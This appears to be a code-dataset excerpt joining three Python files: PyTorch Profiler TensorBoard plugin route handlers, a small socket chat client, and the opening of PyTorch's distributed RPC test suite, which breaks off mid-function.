return self.respond_as_json(run.get_spans(worker))
@wrappers.Request.application
def overview_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
name = request.args.get('run')
run = self._get_run(name)
data = profile.overview
is_gpu_used = profile.has_runtime or profile.has_kernel or profile.has_memcpy_or_memset
normal_workers = [worker for worker in run.workers if worker != 'All']
data['environments'] = [{'title': 'Number of Worker(s)', 'value': str(len(normal_workers))},
{'title': 'Device Type', 'value': 'GPU' if is_gpu_used else 'CPU'}]
if profile.gpu_summary and profile.gpu_tooltip:
data['gpu_metrics'] = {'title': 'GPU Summary',
'data': profile.gpu_summary,
'tooltip': profile.gpu_tooltip}
return self.respond_as_json(data)
@wrappers.Request.application
def operation_pie_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
group_by = request.args.get('group_by')
if group_by == 'OperationAndInputShape':
return self.respond_as_json(profile.operation_pie_by_name_input)
else:
return self.respond_as_json(profile.operation_pie_by_name)
@wrappers.Request.application
def operation_table_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
group_by = request.args.get('group_by')
if group_by == 'OperationAndInputShape':
return self.respond_as_json(profile.operation_table_by_name_input)
else:
return self.respond_as_json(profile.operation_table_by_name)
@wrappers.Request.application
def operation_stack_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
op_name = request.args.get('op_name')
self._validate(op_name=op_name)
group_by = request.args.get('group_by')
input_shape = request.args.get('input_shape')
if group_by == 'OperationAndInputShape':
return self.respond_as_json(profile.operation_stack_by_name_input[str(op_name)+'###'+str(input_shape)])
else:
return self.respond_as_json(profile.operation_stack_by_name[str(op_name)])
@wrappers.Request.application
def kernel_pie_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
return self.respond_as_json(profile.kernel_pie)
@wrappers.Request.application
def kernel_table_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
group_by = request.args.get('group_by')
if group_by == 'Kernel':
return self.respond_as_json(profile.kernel_table)
else:
return self.respond_as_json(profile.kernel_op_table)
@wrappers.Request.application
def kernel_tc_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
return self.respond_as_json(profile.tc_pie)
@wrappers.Request.application
def trace_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
if not profile.has_kernel: # Pure CPU.
raw_data = self._cache.read(profile.trace_file_path)
if not profile.trace_file_path.endswith('.gz'):
raw_data = gzip.compress(raw_data, 1)
else:
file_with_gpu_metrics = self._gpu_metrics_file_dict.get(profile.trace_file_path)
if file_with_gpu_metrics:
raw_data = io.read(file_with_gpu_metrics)
else:
raw_data = self._cache.read(profile.trace_file_path)
if profile.trace_file_path.endswith('.gz'):
raw_data = gzip.decompress(raw_data)
raw_data = profile.append_gpu_metrics(raw_data)
# write the data to temp file
fp = tempfile.NamedTemporaryFile('w+b', suffix='.json.gz', dir=self._temp_dir, delete=False)
fp.close()
# Already compressed, no need to gzip.open
with open(fp.name, mode='wb') as file:
file.write(raw_data)
self._gpu_metrics_file_dict[profile.trace_file_path] = fp.name
headers = [('Content-Encoding', 'gzip')]
headers.extend(TorchProfilerPlugin.headers)
return werkzeug.Response(raw_data, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
@wrappers.Request.application
def dist_gpu_info_route(self, request: werkzeug.Request):
profile = self._get_distributed_profile_for_request(request)
return self.respond_as_json(profile.gpu_info)
@wrappers.Request.application
def comm_overlap_route(self, request: werkzeug.Request):
profile = self._get_distributed_profile_for_request(request)
return self.respond_as_json(profile.steps_to_overlap)
@wrappers.Request.application
def comm_wait_route(self, request: werkzeug.Request):
profile = self._get_distributed_profile_for_request(request)
return self.respond_as_json(profile.steps_to_wait)
@wrappers.Request.application
def comm_ops_route(self, request: werkzeug.Request):
profile = self._get_distributed_profile_for_request(request)
return self.respond_as_json(profile.comm_ops)
@wrappers.Request.application
def memory_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
start_ts = request.args.get('start_ts', None)
end_ts = request.args.get('end_ts', None)
memory_metric = request.args.get('memory_metric', 'KB')
if start_ts is not None:
start_ts = int(start_ts)
if end_ts is not None:
end_ts = int(end_ts)
return self.respond_as_json(
profile.get_memory_stats(start_ts=start_ts, end_ts=end_ts, memory_metric=memory_metric), True)
@wrappers.Request.application
def memory_curve_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
time_metric = request.args.get('time_metric', 'ms')
memory_metric = request.args.get('memory_metric', 'MB')
return self.respond_as_json(
profile.get_memory_curve(time_metric=time_metric, memory_metric=memory_metric), True)
@wrappers.Request.application
def memory_events_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
start_ts = request.args.get('start_ts', None)
end_ts = request.args.get('end_ts', None)
time_metric = request.args.get('time_metric', 'ms')
memory_metric = request.args.get('memory_metric', 'KB')
if start_ts is not None:
start_ts = int(start_ts)
if end_ts is not None:
end_ts = int(end_ts)
return self.respond_as_json(
profile.get_memory_events(start_ts, end_ts, time_metric=time_metric,
memory_metric=memory_metric), True)
@wrappers.Request.application
def module_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
content = profile.get_module_view()
if content:
return self.respond_as_json(content, True)
else:
name = request.args.get('run')
worker = request.args.get('worker')
span = request.args.get('span')
raise exceptions.NotFound('could not find the run for %s/%s/%s' % (name, worker, span))
@wrappers.Request.application
def op_tree_route(self, request: werkzeug.Request):
profile = self._get_profile_for_request(request)
content = profile.get_operator_tree()
return self.respond_as_json(content, True)
@wrappers.Request.application
def diff_run_route(self, request: werkzeug.Request):
base, exp = self.get_diff_runs(request)
diff_stats = self.get_diff_status(base, exp)
content = diff_stats.get_diff_tree_summary()
return self.respond_as_json(content, True)
@wrappers.Request.application
def diff_run_node_route(self, request: werkzeug.Request):
base, exp = self.get_diff_runs(request)
path = request.args.get('path', '0')
stats_dict = self.get_diff_stats_dict(base, exp)
diff_stat = stats_dict.get(path)
if diff_stat is None:
raise exceptions.NotFound('could not find diff run for %s' % (path))
content = diff_stat.get_diff_node_summary(path)
return self.respond_as_json(content, True)
@wrappers.Request.application
def static_file_route(self, request: werkzeug.Request):
filename = os.path.basename(request.path)
extension = os.path.splitext(filename)[1]
if extension == '.html':
mimetype = 'text/html'
elif extension == '.css':
mimetype = 'text/css'
elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
raise exceptions.NotFound('404 Not Found')
return werkzeug.Response(
contents, content_type=mimetype, headers=TorchProfilerPlugin.headers
)
@staticmethod
def respond_as_json(obj, compress: bool = False):
content = json.dumps(obj)
headers = []
headers.extend(TorchProfilerPlugin.headers)
if compress:
content_bytes = content.encode('utf-8')
raw_data = gzip.compress(content_bytes, 1)
headers.append(('Content-Encoding', 'gzip'))
return werkzeug.Response(raw_data, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
else:
return werkzeug.Response(content, content_type=TorchProfilerPlugin.CONTENT_TYPE, headers=headers)
@property
def is_loading(self):
with self._load_lock:
return bool(self._load_threads)
def get_diff_runs(self, request: werkzeug.Request):
name = request.args.get('run')
span = request.args.get('span')
worker = request.args.get('worker')
self._validate(run=name, worker=worker, span=span)
base = self._get_profile(name, worker, span)
exp_name = request.args.get('exp_run')
exp_span = request.args.get('exp_span')
exp_worker = request.args.get('exp_worker')
self._validate(exp_run=exp_name, exp_worker=exp_worker, exp_span=exp_span)
exp = self._get_profile(exp_name, exp_worker, exp_span)
return base, exp
def get_diff_status(self, base: RunProfile, exp: RunProfile):
key = (base, exp)
diff_stats = self.diff_run_cache.get(key)
if diff_stats is None:
diff_stats = base.compare_run(exp)
self.diff_run_cache[key] = diff_stats
return diff_stats
def get_diff_stats_dict(self, base: RunProfile, exp: RunProfile):
key = (base, exp)
stats_dict = self.diff_run_flatten_cache.get(key)
if stats_dict is None:
diff_stats = self.get_diff_status(base, exp)
stats_dict = diff_stats.flatten_diff_tree()
self.diff_run_flatten_cache[key] = stats_dict
return stats_dict
def _monitor_runs(self):
logger.info('Monitor runs begin')
try:
touched = set()
while True:
try:
logger.debug('Scan run dir')
run_dirs = self._get_run_dirs()
has_dir = False
# Assume no deletion on run directories, trigger async load if find a new run
for run_dir in run_dirs:
has_dir = True
if run_dir not in touched:
touched.add(run_dir)
logger.info('Find run directory %s', run_dir)
# Use threading to avoid UI stall and reduce data parsing time
t = threading.Thread(target=self._load_run, args=(run_dir,))
t.start()
with self._load_lock:
self._load_threads.append(t)
if not has_dir:
# handle directory removed case.
self._runs.clear()
except Exception as ex:
logger.warning('Failed to scan runs. Exception=%s', ex, exc_info=True)
time.sleep(consts.MONITOR_RUN_REFRESH_INTERNAL_IN_SECONDS)
except Exception:
logger.exception('Failed to start monitor_runs')
def _receive_runs(self):
while True:
run: Run = self._queue.get()
if run is None:
continue
logger.info('Add run %s', run.name)
with self._runs_lock:
is_new = run.name not in self._runs
self._runs[run.name] = run
if is_new:
self._runs = OrderedDict(sorted(self._runs.items()))
def _get_run_dirs(self):
"""Scan logdir, find PyTorch Profiler run directories.
A directory is considered to be a run if it contains 1 or more *.pt.trace.json[.gz].
E.g. there are 2 runs: run1, run2
/run1
/[worker1].pt.trace.json.gz
/[worker2].pt.trace.json.gz
/run2
/[worker1].pt.trace.json
"""
for root, _, files in io.walk(self.logdir):
for file in files:
if utils.is_chrome_trace_file(file):
yield root
break
def _load_run(self, run_dir):
try:
name = self._get_run_name(run_dir)
logger.info('Load run %s', name)
# Currently, assume run data is immutable, so just load once
loader = RunLoader(name, run_dir, self._cache)
run = loader.load()
logger.info('Run %s loaded', name)
self._queue.put(run)
except Exception as ex:
logger.warning('Failed to load run %s. Exception=%s', ex, name, exc_info=True)
t = threading.current_thread()
with self._load_lock:
try:
self._load_threads.remove(t)
except ValueError:
logger.warning('could not find the thread {}'.format(run_dir))
def _get_run(self, name) -> Run:
with self._runs_lock:
run = self._runs.get(name, None)
if run is None:
raise exceptions.NotFound('could not find the run for %s' % (name))
return run
def _get_run_name(self, run_dir):
logdir = io.abspath(self.logdir)
if run_dir == logdir:
name = io.basename(run_dir)
else:
name = io.relpath(run_dir, logdir)
return name
def _get_profile_for_request(self, request: werkzeug.Request) -> RunProfile:
name = request.args.get('run')
span = request.args.get('span')
worker = request.args.get('worker')
self._validate(run=name, worker=worker)
profile = self._get_profile(name, worker, span)
if not isinstance(profile, RunProfile):
raise exceptions.BadRequest('Get an unexpected profile type %s for %s/%s' % (type(profile), name, worker))
return profile
def _get_distributed_profile_for_request(self, request: werkzeug.Request) -> DistributedRunProfile:
name = request.args.get('run')
span = request.args.get('span')
self._validate(run=name)
profile = self._get_profile(name, 'All', span)
if not isinstance(profile, DistributedRunProfile):
raise exceptions.BadRequest('Get an unexpected distributed profile type %s for %s' % (type(profile), name))
return profile
def _get_profile(self, name, worker, span):
run = self._get_run(name)
profile = run.get_profile(worker, span)
if profile is None:
raise exceptions.NotFound('could not find the profile for %s/%s/%s ' % (name, worker, span))
return profile
def _validate(self, **kwargs):
for name, v in kwargs.items():
if v is None:
raise exceptions.BadRequest('Must specify %s in request url' % (name))
|
client.py | import socket
import threading
flag = 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostname = input("Enter your host :: ")
s.connect((hostname, 1023))
nickname = input("Enter your Name :: ")
def recieve():
while True:
try:
msg = s.recv(1024).decode("utf-8")
if msg == "NICK":
print("Welcome to Chat room :: ", nickname)
s.send(bytes(nickname, "utf-8"))
else:
print(msg)
except Exception as error:
print(f"An Erro occured {error}")
s.close()
flag = 1
break
def Write():
while True:
try:
reply_msg = f"{nickname} :: {input()}"
s.send(bytes(reply_msg, "utf-8"))
except Exception as error:
print(f"An Error Occured while sending message !!!\n error : {error}")
s.close()
flag = 1
break
if flag == 1:
exit()
recieve_thrd = threading.Thread(target=recieve)
recieve_thrd.start()
write_thrd = threading.Thread(target=Write)
write_thrd.start()
|
rpc_test.py | import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def identity(a):
return a
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
class RpcTestCommon():
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _nested_rpc(self, f, expected):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
